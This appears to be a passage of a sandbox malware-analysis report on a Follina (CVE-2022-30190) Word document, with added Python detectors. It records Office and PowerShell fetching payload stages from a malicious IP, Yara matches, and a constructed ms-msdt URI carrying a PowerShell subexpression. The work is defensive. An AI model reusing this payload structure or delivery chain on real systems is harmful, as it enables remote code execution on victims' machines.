                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://invites.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lifecycle.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.microsoftonline.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.local
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.contentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.pagecontentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeapps.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/embed?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://osi.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://otelrules.azureedge.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/review/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://roaming.edog.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://settings.outlook.com
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://staging.cortana.ai
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://tasks.office.com
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://webshell.suite.office.com
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://wus2.contentsync.
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://wus2.pagecontentsync.
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic | HTTP traffic detected:
    GET /123.RES HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: 185.234.247.119
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /123.RES HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: 185.234.247.119
    If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
    If-None-Match: "6299dd5d-1861"
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /972639944.dat HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: 185.234.247.119
    Connection: Keep-Alive
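Added example (not part of the Joe Sandbox report): a proxy-log correlation for the two-stage fetch recorded above, where an Office user agent retrieves the external template (/123.RES) and, seconds later, a WindowsPowerShell user agent spawned through msdt.exe retrieves the next stage (/972639944.dat) from the same bare-IP host. The log format and every record are constructed for illustration; only the host, paths and user-agent strings mirror the report.

```python
"""Correlate Office-UA and PowerShell-UA requests to the same host within a
short window, the delivery shape of the Follina chain in this report.
Added example, not Joe Sandbox code; log format and records are constructed."""
import ipaddress
import re
from datetime import datetime, timedelta

OFFICE_UA = re.compile(r"ms-office|MSOffice \d+", re.I)
POWERSHELL_UA = re.compile(r"WindowsPowerShell/", re.I)

# Constructed records (not the report's pcap), tab-separated:
# timestamp, client, destination host, method, path, User-Agent.
SAMPLE_LOG = """\
2022-06-03T10:08:01Z\t10.0.0.5\t185.234.247.119\tGET\t/123.RES\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; ms-office; MSOffice 16)
2022-06-03T10:08:02Z\t10.0.0.5\t185.234.247.119\tGET\t/123.RES\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; ms-office; MSOffice 16)
2022-06-03T10:08:09Z\t10.0.0.5\t185.234.247.119\tGET\t/972639944.dat\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
2022-06-03T10:09:00Z\t10.0.0.7\tcdn.example.net\tGET\t/office/data/v32.cab\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; ms-office; MSOffice 16)
2022-06-03T10:20:00Z\t10.0.0.9\tintranet.example.net\tGET\t/health\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
"""


def parse_log(text):
    """Parse the constructed tab-separated format into dicts sorted by time."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, path, ua = line.split("\t", 5)
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client, "host": host, "method": method, "path": path, "ua": ua,
        })
    return sorted(rows, key=lambda r: r["ts"])


def is_raw_ip(host):
    """True when the Host header is a bare IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def correlate(rows, window=timedelta(minutes=5)):
    """One finding per (client, host) pair where an Office-UA request is
    followed within `window` by a PowerShell-UA request to the same host."""
    by_pair = {}
    for r in rows:
        by_pair.setdefault((r["client"], r["host"]), []).append(r)
    findings = []
    for (client, host), reqs in by_pair.items():
        office = [r for r in reqs if OFFICE_UA.search(r["ua"])]
        shell = [r for r in reqs if POWERSHELL_UA.search(r["ua"])]
        for o in office:
            later = [s for s in shell if o["ts"] <= s["ts"] <= o["ts"] + window]
            if later:
                findings.append({
                    "client": client, "host": host,
                    "stage1": o["path"], "stage2": later[0]["path"],
                    "delta_s": int((later[0]["ts"] - o["ts"]).total_seconds()),
                    # a bare-IP host is the extra signal present in this sample
                    "severity": "high" if is_raw_ip(host) else "medium",
                })
                break  # one finding per pair, even when Office re-fetched the template
    return findings


if __name__ == "__main__":
    for finding in correlate(parse_log(SAMPLE_LOG)):
        print(finding)
```

The benign Office fetch from cdn.example.net and the lone PowerShell request from 10.0.0.9 produce nothing; only the 10.0.0.5 pair is reported, with the 8-second gap between stages and a high severity because the host is a raw IP.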
Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 2984, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
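Added example (not Joe Sandbox or Yara-rule code): offline triage of the two document-side artifacts behind the matches above. The first check opens a .docx and lists relationships with TargetMode="External", since an external oleObject or attachedTemplate pointing at a URL is what makes Word fetch the HTML part that lands in Content.MSO. The second check does what MAL_Msdt_MSProtocolURI_May22 amounts to on that fetched HTML: find the ms-msdt: URI and a PowerShell $( ) subexpression inside IT_BrowseForFile. The .docx and HTML are constructed in memory (the target URL uses a documentation address and the stage-2 text is a placeholder); neither is taken from the analysed sample.

```python
"""Triage a .docx for remote-loading relationships and a fetched HTML part
for the ms-msdt: URI pattern (CVE-2022-30190). Added example; the package
and HTML below are constructed, not extracted from doc782.docx."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_relationships(docx_bytes):
    """(part, short relationship type, target) for every relationship with
    TargetMode="External" in any .rels part of the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "").lower() == "external":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((part, rtype, rel.get("Target", "")))
    return found


def triage_docx(docx_bytes):
    """Hyperlinks are normally external; an external, remote oleObject or
    attachedTemplate makes Word fetch and render foreign content."""
    ext = external_relationships(docx_bytes)
    loaders = [e for e in ext
               if e[1] in ("oleObject", "attachedTemplate")
               and re.match(r"(?i)https?://", e[2])]
    return {"external": ext, "remote_loaders": loaders,
            "verdict": "suspicious" if loaders else "clean"}


MSDT_URI = re.compile(r"ms-msdt:\s*/?id\s+(\S+)", re.I)
BROWSE = re.compile(r'IT_BrowseForFile=(.*?)(?:\\"|"|$)', re.M)


def scan_html(text):
    """Flag an ms-msdt: protocol URI and a PowerShell subexpression $( )
    smuggled through the IT_BrowseForFile diagnostic parameter."""
    uri = MSDT_URI.search(text)
    browse = BROWSE.search(text)
    value = browse.group(1) if browse else ""
    sub = "$(" in value
    verdict = "malicious" if uri and sub else "suspicious" if uri else "clean"
    return {"has_msdt_uri": uri is not None,
            "diagnostic": uri.group(1) if uri else None,
            "browse_for_file": value, "subexpression": sub, "verdict": verdict}


def build_sample_docx(rel_type, target):
    """Constructed minimal package with one external relationship of rel_type."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}{rel_type}" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed stand-in for the fetched HTML part; the stage-2 text is a placeholder.
SAMPLE_HTML = (
    "<html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    "IT_BrowseForFile=$(Invoke-Expression('<stage-2 placeholder>'))"
    'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"";\n'
    "</script></body></html>"
)

if __name__ == "__main__":
    print(triage_docx(build_sample_docx("oleObject", "http://198.51.100.10/123.RES!")))
    print(scan_html(SAMPLE_HTML))
```

The verdict split is deliberate: an external hyperlink alone stays clean, an external oleObject with an http(s) target is suspicious before any network access, and the HTML only becomes malicious when the ms-msdt: URI is combined with a $( ) subexpression in IT_BrowseForFile, which is the part the troubleshooter evaluates as PowerShell.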
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049A2988
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049A358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049A8240
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049A670F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049A6350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042B2988
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042B358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042B8240
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042B670F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042B6350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_008258CA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_008258D4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_00822B11
